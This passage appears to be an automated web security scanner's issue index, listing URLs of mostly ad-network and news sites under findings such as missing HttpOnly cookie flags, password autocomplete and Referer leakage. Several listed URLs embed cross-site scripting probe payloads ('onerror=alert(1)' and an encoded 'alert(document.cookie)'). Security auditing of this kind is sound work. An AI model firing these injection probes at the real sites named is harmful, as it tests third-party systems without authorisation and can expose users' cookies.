12.98. http://geek.us.intellitxt.com/intellitxt/front.asp

12.99. http://i.simpli.fi/dpx.js

12.100. http://i.w55c.net/ping_match.gif

12.101. http://ib.adnxs.com/ab

12.102. http://ib.adnxs.com/getuid

12.103. http://ib.adnxs.com/if

12.104. http://ib.adnxs.com/mapuid

12.105. http://ib.adnxs.com/pxj

12.106. http://ib.adnxs.com/seg

12.107. http://id.washingtonpost.com/identity/public/visitor/ip_address.json

12.108. http://idcs.interclick.com/Segment.aspx

12.109. http://idpix.media6degrees.com/orbserv/hbpix

12.110. http://image2.pubmatic.com/AdServer/Pug

12.111. http://imp.fetchback.com/serve/fb/adtag.js

12.112. http://imp.fetchback.com/serve/fb/imp

12.113. http://judo.salon.com/RealMedia/ads/adstream_mjx.ads/www.salonmagazine.com/letters/default.html/1995569501@Top,Frame2,x10,x15,x50,Right,Right1,Right2,Right3,Bottom,Bottom1,Bottom2,Position1,Position2

12.114. http://knowyourmobile.uk.intellitxt.com/al.asp

12.115. http://knowyourmobile.uk.intellitxt.com/intellitxt/front.asp

12.116. http://knowyourmobile.uk.intellitxt.com/v4/init

12.117. http://l.sharethis.com/pview

12.118. http://leadback.advertising.com/adcedge/lb

12.119. http://load.exelator.com/load/

12.120. http://loadm.exelator.com/load/

12.121. http://m.adnxs.com/msftcookiehandler

12.122. http://map.media6degrees.com/orbserv/hbjs

12.123. http://map.media6degrees.com/orbserv/hbpix

12.124. http://media.fastclick.net/w/tre

12.125. http://metrics.philly.com/b/ss/phillycom/1/H.17/s66140788192520

12.126. http://metrics.philly.com/b/ss/phillycom/1/H.17/s67586282941047

12.127. http://optimized-by.rubiconproject.com/a/8430/13646/27091-15.img

12.128. http://optimized-by.rubiconproject.com/a/8430/13646/27091-15.js

12.129. http://optimized-by.rubiconproject.com/a/8430/13646/27091-2.img

12.130. http://optimized-by.rubiconproject.com/a/8430/13646/27091-2.js

12.131. http://optimized-by.rubiconproject.com/a/dk.js

12.132. http://osmdcs.interclick.com/pixelChecked.aspx

12.133. http://p.brilig.com/contact/bct

12.134. http://pc2.yumenetworks.com/dynamic_btx/115_89795

12.135. http://ping.crowdscience.com/ping.js

12.136. http://pix04.revsci.net/J05531/b3/0/3/0902121/684510010.js

12.137. http://pix04.revsci.net/J09847/b3/0/3/0902121/181431347.js

12.138. http://pix04.revsci.net/J09847/b3/0/3/0902121/629948657.js

12.139. http://pix04.revsci.net/J09847/b3/0/3/0902121/64913653.js

12.140. http://pix04.revsci.net/J09847/b3/0/3/0902121/700534142.js

12.141. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

12.142. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

12.143. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

12.144. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

12.145. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

12.146. http://pixel.intellitxt.com/pixel.jsp

12.147. http://pixel.quantserve.com/api/segments.json

12.148. http://pixel.quantserve.com/pixel

12.149. http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif

12.150. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

12.151. http://pixel.rubiconproject.com/tap.php

12.152. http://pixel.rubiconproject.com/tap.php

12.153. http://pts.eyewonder.com/ewr

12.154. http://r.openx.net/set

12.155. http://r.turn.com/r/bd

12.156. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

12.157. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/8Ac90

12.158. http://r.turn.com/server/pixel.htm

12.159. http://r1-ads.ace.advertising.com/site=801873/size=300250/u=2/bnum=37860280/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dreg%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

12.160. http://r1-ads.ace.advertising.com/site=801873/size=300250/u=2/bnum=82264378/hr=9/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fphilly%252Fnews%252Fnation_world%252F121548659.html%253Fef135%252527%25253balert%2528document.cookie%2529%252F%252F4b169261d24%253D1

12.161. http://r1-ads.ace.advertising.com/site=801873/size=300250/u=2/bnum=93300171/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dlogin%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

12.162. http://r1-ads.ace.advertising.com/site=801877/size=728090/u=2/bnum=1219384/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dreg%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

12.163. http://r1-ads.ace.advertising.com/site=801877/size=728090/u=2/bnum=18662554/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dlogin%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

12.164. http://segment-pixel.invitemedia.com/pixel

12.165. http://segments.adap.tv/data/

12.166. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544154

12.167. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544431

12.168. http://slashphone.us.intellitxt.com/intellitxt/front.asp

12.169. http://slashphone.us.intellitxt.com/v4/init

12.170. http://sync.mathtag.com/sync/img

12.171. http://syndication.mmismm.com/tntwo.php

12.172. http://t.invitemedia.com/track_imp

12.173. http://tacoda.at.atwola.com/rtx/r.js

12.174. http://tag.contextweb.com/TagPublish/getad.aspx

12.175. http://tag.contextweb.com/TagPublish/getad.aspx

12.176. http://tag.contextweb.com/TagPublish/getjs.aspx

12.177. http://tags.bluekai.com/site/2554

12.178. http://tags.bluekai.com/site/3200

12.179. http://tags.bluekai.com/site/3358

12.180. http://tags.bluekai.com/site/353

12.181. http://tags.bluekai.com/site/3561

12.182. http://tap.rubiconproject.com/partner/agent/rubicon/insight.js

12.183. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5nPIMRa2RErgj_SiOwKJhEXwW6CKnglhixFGYeVivba-oTLnOWMrlgH/view.html

12.184. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ru/d3d3LmFtY29ubWFnLmNvbQ==/1590479807/v/576462396568677351/ac/781370/b/276176/c/474250/view.gif

12.185. http://tracking.adjug.com/AdJugTracking/Tracker.aspx

12.186. http://tracking.skyword.com/tracker.gif

12.187. http://trgc.opt.fimserve.com/fp.gif

12.188. http://trgca.opt.fimserve.com/fp.gif

12.189. http://va.px.invitemedia.com/adnxs_imp

12.190. http://va.px.invitemedia.com/goog_imp

12.191. http://www.facebook.com/brandlift.php

12.192. http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce

12.193. http://www.knowyourmobile.com/auth/status.php

12.194. http://www.youtube.com/embed/Iev7TKsXoHo

13. Cookie without HttpOnly flag set

13.1. http://ads.adxpose.com/ads/ads.js

13.2. http://adv.netshelter.net/advlogging/impression.php

13.3. http://api.adsme.com/api/js/rss/adsme.js

13.4. http://api.joliprint.com/api/img/paidcontent.org/adsme_btn_default.png

13.5. http://api.joliprint.com/res/joliprint/img/buttons/default/joliprint_btn_blank.gif

13.6. http://chat.livechatinc.net/licence/1051282/script.cgi

13.7. http://contentnext.disqus.com/thread.js

13.8. http://dg.specificclick.net/

13.9. http://event.adxpose.com/event.flow

13.10. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs

13.11. http://id.expressnightout.com/identity/public/visitor.json

13.12. http://id.slate.com/identity/public/visitor.json

13.13. http://id.theroot.com/identity/public/visitor.json

13.14. http://id.trove.com/identity/public/visitor.json

13.15. http://letters.salon.com/politics/war_room/2011/05/09/santorum_loser/view/

13.16. http://map.media6degrees.com/orbserv/hbjs

13.17. http://moconews.net/article/419-nfc-in-focus-at-google-io-as-foursquare-hashable-join-party/

13.18. http://politics.gather.com/viewArticle.action

13.19. http://probitaspartners.com/

13.20. http://s.clickability.com/s

13.21. http://slashgeardotcom.disqus.com/thread.js

13.22. http://t.mookie1.com/t/v1/imp

13.23. http://tracking.skyword.com/tracker.gif

13.24. http://ttwbs.channelintelligence.com/

13.25. http://www.amconmag.com/favicon.ico

13.26. http://www.androidcentral.com/android-central-google-io-2011

13.27. http://www.gather.com/6360d%3Cimg%20src%3da%20onerror%3dalert(1)%3E1b6979d15ce

13.28. http://www.ricksantorum.com/

13.29. http://www.smartphoneexperts.com/

13.30. http://www.symbiosting.com/LogicBuy/geek/content-syndicate.php

13.31. http://www.tlsubmit.com/checkout/signup.php

13.32. http://a.tribalfusion.com/displayAd.js

13.33. http://a.tribalfusion.com/j.ad

13.34. http://a1.interclick.com/getInPageJSProcess.aspx

13.35. http://a1.interclick.com/getInPageJSProcess.aspx

13.36. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp

13.37. http://action.mathtag.com/mm/rtb/TREE/1101A0/imp

13.38. http://ad.afy11.net/ad

13.39. http://ad.amgdgt.com/ads/

13.40. http://ad.bnmla.com/serve

13.41. http://ad.media6degrees.com/adserv/cs

13.42. http://ad.media6degrees.com/adserv/csst

13.43. http://ad.trafficmp.com/a/bpix

13.44. http://ad.trafficmp.com/a/bpix

13.45. http://ad.trafficmp.com/a/js

13.46. http://ad.turn.com/server/ads.js

13.47. http://ad.turn.com/server/pixel.htm

13.48. http://ad.yieldmanager.com/imp

13.49. http://ad.yieldmanager.com/pixel

13.50. http://ad.yieldmanager.com/pixel

13.51. http://admeld.lucidmedia.com/clicksense/admeld/match

13.52. http://ads.adbrite.com/adserver/behavioral-data/8203

13.53. http://ads.adbrite.com/adserver/vdi/684339

13.54. http://ads.adbrite.com/adserver/vdi/742697

13.55. http://ads.adbrite.com/adserver/vdi/762701

13.56. http://ads.adbrite.com/adserver/vdi/762701

13.57. http://ads.pointroll.com/PortalServe/

13.58. http://ads.revsci.net/adserver/ako

13.59. http://ads.revsci.net/adserver/ako

13.60. http://ads.revsci.net/adserver/ako

13.61. http://ads.revsci.net/adserver/ako

13.62. http://ads.revsci.net/adserver/ako

13.63. http://ads.revsci.net/adserver/ako

13.64. http://ads.revsci.net/adserver/ako

13.65. http://ads.revsci.net/adserver/ako

13.66. http://ads.shorttail.net/cgi-bin/ads/ad20135bg.cgi/v=2.3S/sz=1x1A/90673/NF/RETURN-CODE/JS/

13.67. http://ads.specificmedia.com/serve/v=5

13.68. http://ads2.adbrite.com/v0/ad

13.69. http://adsfac.us/ag.asp

13.70. http://adsfac.us/ag.asp

13.71. http://adsfac.us/ag.asp

13.72. http://adv.netshelter.net/context_keywords/k_log.php

13.73. http://afe.specificclick.net/

13.74. http://ak1.abmr.net/is/tag.admeld.com

13.75. http://ak1.abmr.net/is/tag.contextweb.com

13.76. http://altfarm.mediaplex.com/ad/bn/17550-128038-2754-3

13.77. http://altfarm.mediaplex.com/ad/fm/13305-124472-22136-1

13.78. http://amch.questionmarket.com/adsc/d887938/36/500004878102/adscout.php

13.79. http://api.bizographics.com/v1/profile.redirect

13.80. http://api.twitter.com/1/statuses/user_timeline.json

13.81. http://api.viglink.com/api/ping

13.82. http://application.knowyourmobile.com/images/blue-background-15.png

13.83. http://application.knowyourmobile.com/images/dennis_color_logo_70.gif

13.84. http://application.knowyourmobile.com/images/knowyourmobile.ico

13.85. http://application.knowyourmobile.com/images/newkymheaderbackdrop_248.gif

13.86. http://application.knowyourmobile.com/images/tag-bg.gif

13.87. http://application.knowyourmobile.com/phones4u/images/300x400xhead.jpg

13.88. http://application.knowyourmobile.com/phones4u/images/blackberry300banner.jpg

13.89. http://application.knowyourmobile.com/phones4u/images/nav_menu.png

13.90. http://application.knowyourmobile.com/phones4u/mobilev3.css

13.91. http://ar.voicefive.com/b/wc_beacon.pli

13.92. http://ar.voicefive.com/bmx3/broker.pli

13.93. http://ar.voicefive.com/bmx3/broker.pli

13.94. http://as.casalemedia.com/j

13.95. http://as.casalemedia.com/j

13.96. http://as.casalemedia.com/s

13.97. http://b.scorecardresearch.com/b

13.98. http://b.scorecardresearch.com/p

13.99. http://b.scorecardresearch.com/r

13.100. http://b.voicefive.com/b

13.101. http://bcp.crwdcntrl.net/4/c=368|rand=317175907|genp=na

13.102. http://bcp.crwdcntrl.net/4/c=402%7Crand=271498847%7Cpv=y%7Casync=y%7Crt=ifr

13.103. http://bcp.crwdcntrl.net/4/c=402|rand=214441500|pv=y|async=y|rt=ifr

13.104. http://bcp.crwdcntrl.net/4/c=402|rand=286689202|pv=y|async=y|rt=ifr

13.105. http://bcp.crwdcntrl.net/4/c=402|rand=300411654|pv=y|async=y|rt=ifr

13.106. http://bcp.crwdcntrl.net/4/c=402|rand=344848627|pv=y|async=y|rt=ifr

13.107. http://bcp.crwdcntrl.net/4/c=402|rand=690730866|pv=y|async=y|rt=ifr

13.108. http://bcp.crwdcntrl.net/4/c=402|rand=827443052|pv=y|async=y|rt=ifr

13.109. http://bcp.crwdcntrl.net/4/c=402|rand=908408442|pv=y|async=y|rt=ifr

13.110. http://bh.contextweb.com/bh/rtset

13.111. http://bid.openx.net/json

13.112. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.113. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.114. http://bstats.adbrite.com/adserver/behavioral-data/0

13.115. http://bstats.adbrite.com/click/bstats.gif

13.116. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js

13.117. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js

13.118. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js

13.119. http://c7.zedo.com/utils/ecSet.js

13.120. http://cas.criteo.com/delivery/admeld_map

13.121. http://cas.criteo.com/delivery/ajs.php

13.122. http://cdn4.eyewonder.com/cm/js/10295-119241-10420-6

13.123. http://cms.ad.yieldmanager.net/v1/cms

13.124. http://cms.quantserve.com/dpixel

13.125. http://contextweb-match.dotomi.com/

13.126. http://cw-m.d.chango.com/m/cw

13.127. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/3658195966029417970

13.128. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2931142961646634775/mchpid/4/url/

13.129. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3658195966029417970

13.130. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3658195966029417970/mchpid/4/url/

13.131. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/3658195966029417970

13.132. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/3658195966029417970

13.133. http://d.tradex.openx.com/afr.php

13.134. http://d.tradex.openx.com/lg.php

13.135. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

13.136. http://data.adsrvr.org/map/cookie/contextweb

13.137. http://data.cmcore.com/imp

13.138. http://digg.com/tools/services

13.139. http://dis.ny.us.criteo.com/dis/dis.aspx

13.140. http://dpm.demdex.net/ibs:dpid=269&dpuuid=4dc0222e-3ec1-3315-901d-9f5b34470a53&ddsuuid=07682087270591542282216767355449152816

13.141. http://forum.androidcentral.com/external.php

13.142. http://g-pixel.invitemedia.com/gmatcher

13.143. http://gather.us.intellitxt.com/intellitxt/front.asp

13.144. http://geek.us.intellitxt.com/intellitxt/front.asp

13.145. http://i.simpli.fi/dpx.js

13.146. http://i.w55c.net/ping_match.gif

13.147. http://id.washingtonpost.com/identity/public/visitor/ip_address.json

13.148. http://idcs.interclick.com/Segment.aspx

13.149. http://idpix.media6degrees.com/orbserv/hbpix

13.150. http://image2.pubmatic.com/AdServer/Pug

13.151. http://imp.fetchback.com/serve/fb/adtag.js

13.152. http://imp.fetchback.com/serve/fb/imp

13.153. http://judo.salon.com/RealMedia/ads/adstream_mjx.ads/www.salonmagazine.com/letters/default.html/1995569501@Top,Frame2,x10,x15,x50,Right,Right1,Right2,Right3,Bottom,Bottom1,Bottom2,Position1,Position2

13.154. http://knowyourmobile.uk.intellitxt.com/al.asp

13.155. http://knowyourmobile.uk.intellitxt.com/intellitxt/front.asp

13.156. http://knowyourmobile.uk.intellitxt.com/v4/init

13.157. http://l.betrad.com/ct/0_0_0_0_0_456/us/0/1/0/0/0/0/1/242/273/0/pixel.gif

13.158. http://l.betrad.com/ct/0_0_0_0_0_632/us/0/1/0/0/0/0/16/242/111/0/pixel.gif

13.159. http://l.betrad.com/pub/p.gif

13.160. http://l.sharethis.com/pview

13.161. http://leadback.advertising.com/adcedge/lb

13.162. http://load.exelator.com/load/

13.163. http://loadm.exelator.com/load/

13.164. http://map.media6degrees.com/orbserv/hbpix

13.165. http://media.fastclick.net/w/tre

13.166. http://metrics.philly.com/b/ss/phillycom/1/H.17/s66140788192520

13.167. http://metrics.philly.com/b/ss/phillycom/1/H.17/s67586282941047

13.168. http://moconews.net/embeds/sub_menu/

13.169. http://optimized-by.rubiconproject.com/a/8430/13646/27091-15.img

13.170. http://optimized-by.rubiconproject.com/a/8430/13646/27091-15.js

13.171. http://optimized-by.rubiconproject.com/a/8430/13646/27091-2.img

13.172. http://optimized-by.rubiconproject.com/a/8430/13646/27091-2.js

13.173. http://optimized-by.rubiconproject.com/a/dk.js

13.174. http://osmdcs.interclick.com/pixelChecked.aspx

13.175. http://p.brilig.com/contact/bct

13.176. http://paidcontent.org/embeds/member_variables/

13.177. http://pc2.yumenetworks.com/dynamic_btx/115_89795

13.178. http://ping.crowdscience.com/ping.js

13.179. http://pix04.revsci.net/J05531/b3/0/3/0902121/684510010.js

13.180. http://pix04.revsci.net/J09847/b3/0/3/0902121/181431347.js

13.181. http://pix04.revsci.net/J09847/b3/0/3/0902121/629948657.js

13.182. http://pix04.revsci.net/J09847/b3/0/3/0902121/64913653.js

13.183. http://pix04.revsci.net/J09847/b3/0/3/0902121/700534142.js

13.184. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

13.185. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

13.186. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

13.187. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

13.188. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

13.189. http://pixel.intellitxt.com/pixel.jsp

13.190. http://pixel.quantserve.com/api/segments.json

13.191. http://pixel.quantserve.com/pixel

13.192. http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif

13.193. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

13.194. http://pixel.rubiconproject.com/tap.php

13.195. http://pixel.rubiconproject.com/tap.php

13.196. http://pts.eyewonder.com/ewr

13.197. http://q1.checkm8.com/adam/detect

13.198. http://q1.checkm8.com/adam/detected

13.199. http://r.openx.net/set

13.200. http://r.turn.com/r/bd

13.201. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

13.202. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/8Ac90

13.203. http://r.turn.com/server/pixel.htm

13.204. http://r1-ads.ace.advertising.com/site=801873/size=300250/u=2/bnum=37860280/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dreg%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

13.205. http://r1-ads.ace.advertising.com/site=801873/size=300250/u=2/bnum=82264378/hr=9/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fphilly%252Fnews%252Fnation_world%252F121548659.html%253Fef135%252527%25253balert%2528document.cookie%2529%252F%252F4b169261d24%253D1

13.206. http://r1-ads.ace.advertising.com/site=801873/size=300250/u=2/bnum=93300171/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dlogin%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

13.207. http://r1-ads.ace.advertising.com/site=801877/size=728090/u=2/bnum=1219384/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dreg%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

13.208. http://r1-ads.ace.advertising.com/site=801877/size=728090/u=2/bnum=18662554/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dlogin%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

13.209. http://ricksantorum.com/explore/

13.210. http://roia.biz/im/v/2sgjvq1BAAGUxkMAAAsDQgAArjg-A/p

13.211. http://roia.biz/im/v/nW08vq1BAAGUxkMAAAsDQgAArj4-A/p

13.212. http://s26.sitemeter.com/js/counter.asp

13.213. http://samsungsmarttvs.netshelter.net/fixed_placement.js.php

13.214. http://samsungsmarttvs.netshelter.net/video_fixed_placement.js.php

13.215. https://secure.smartphoneexperts.com/

13.216. https://secure.smartphoneexperts.com/content/customercare/page-status.htm

13.217. http://segment-pixel.invitemedia.com/pixel

13.218. http://segments.adap.tv/data/

13.219. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544154

13.220. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544431

13.221. http://slashphone.us.intellitxt.com/intellitxt/front.asp

13.222. http://slashphone.us.intellitxt.com/v4/init

13.223. http://store.androidcentral.com/

13.224. https://support.ccbill.com/

13.225. http://sync.mathtag.com/sync/img

13.226. http://syndication.mmismm.com/tntwo.php

13.227. http://t.invitemedia.com/track_imp

13.228. http://tacoda.at.atwola.com/rtx/r.js

13.229. http://tag.admeld.com/ad/iframe/610/unified/728x90/pmh_657143_29771683

13.230. http://tag.contextweb.com/TagPublish/getad.aspx

13.231. http://tag.contextweb.com/TagPublish/getad.aspx

13.232. http://tag.contextweb.com/TagPublish/getjs.aspx

13.233. http://tags.bluekai.com/site/2554

13.234. http://tags.bluekai.com/site/3200

13.235. http://tags.bluekai.com/site/3358

13.236. http://tags.bluekai.com/site/353

13.237. http://tags.bluekai.com/site/3561

13.238. http://tap.rubiconproject.com/partner/agent/rubicon/insight.js

13.239. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4_KFHtXV6PPxtDmPIBUxUED/view.html

13.240. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5nPIMRa2RErgj_SiOwKJhEXwW6CKnglhixFGYeVivba-oTLnOWMrlgH/view.html

13.241. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ru/d3d3LmFtY29ubWFnLmNvbQ==/1590479807/v/576462396568677351/ac/781370/b/276176/c/474250/view.gif

13.242. http://tracking.adjug.com/AdJugTracking/Tracker.aspx

13.243. http://trgc.opt.fimserve.com/fp.gif

13.244. http://trgca.opt.fimserve.com/fp.gif

13.245. http://ultraedit.app7.hubspot.com/salog.js.aspx

13.246. http://va.px.invitemedia.com/adnxs_imp

13.247. http://va.px.invitemedia.com/goog_imp

13.248. http://weathergang.washingtonpost.com/rest/conditions/20001j

13.249. http://www.facebook.com/brandlift.php

13.250. http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce

13.251. http://www.knowyourmobile.com/auth/status.php

13.252. http://www.perfumania.com/wcsstore/PerfumaniaSAS/upload/images/products/PRFM-193531.jpg

13.253. http://www.ultraedit.com/updates/ultracompare/ucupdate.html

13.254. http://www.ultraedit.com/updates/ultracompare/ucupdates2

13.255. http://www.youtube.com/embed/Iev7TKsXoHo

14. Password field with autocomplete enabled

14.1. http://www.gather.com/login.action

14.2. http://www.geek.com/articles/geek-pick/google-music-to-launch-in-beta-at-io-2011-20110510/

14.3. http://www.philly.com/philly/news/nation_world/121548659.html

14.4. http://www.philly.com/s

14.5. http://www.tlsubmit.com/affiliate_signup.html

14.6. http://www.tlsubmit.com/checkout/member.php

15. Source code disclosure

15.1. http://platform.linkedin.com/js/nonSecureAnonymousFramework

15.2. http://www.surveygizmo.com/s3/polljs/539472-DPU5JRD6BN7QFZ9AI8X6B82W22I59H/

16. Referer-dependent response

16.1. http://ad.doubleclick.net/N6496/adj/gather.com/

16.2. http://ads.adbrite.com/adserver/behavioral-data/8203

16.3. http://ads.adbrite.com/adserver/vdi/742697

16.4. http://ads.adbrite.com/adserver/vdi/762701

16.5. http://bstats.adbrite.com/click/bstats.gif

16.6. http://cdn.shoutlet.com/service/shoutletshare/worker

16.7. http://d.tradex.openx.com/afr.php

16.8. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs

16.9. http://philly.badgeville.com/api/cGhpbGx5QGJhZGdldmlsbGUuY29t/widgets/comments

16.10. http://www.facebook.com/plugins/activity.php

16.11. http://www.facebook.com/plugins/like.php

16.12. http://www.facebook.com/plugins/likebox.php

16.13. http://www.youtube.com/embed/Iev7TKsXoHo

17. Cross-domain POST

17.1. http://ricksantorum.com/explore/

17.2. http://store.androidcentral.com/cart.htm

17.3. http://www.ricksantorum.com/

17.4. http://www.ricksantorum.com/

18. Cross-domain Referer leakage

18.1. http://ad.amgdgt.com/ads/

18.2. http://ad.amgdgt.com/ads/

18.3. http://ad.amgdgt.com/ads/

18.4. http://ad.bnmla.com/serve

18.5. http://ad.bnmla.com/serve

18.6. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5

18.7. http://ad.doubleclick.net/adi/N1558.CasaleMedia/B4461671.2

18.8. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.9. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.10. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.11. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.12. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.13. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.14. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.15. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.16. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.17. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

18.18. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400

18.19. http://ad.doubleclick.net/adi/N4441.contextweb.com/B5238188.3

18.20. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

18.21. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.20

18.22. http://ad.doubleclick.net/adi/N5371.media6/B5451956.2

18.23. http://ad.doubleclick.net/adi/N6344.126328.SPECIFICMEDIA/B5358490.6

18.24. http://ad.doubleclick.net/adi/N6543.131803.TURN.COM/B5513576.10

18.25. http://ad.doubleclick.net/adi/huffpost.politics/news

18.26. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech

18.27. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest

18.28. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.13

18.29. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.13

18.30. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

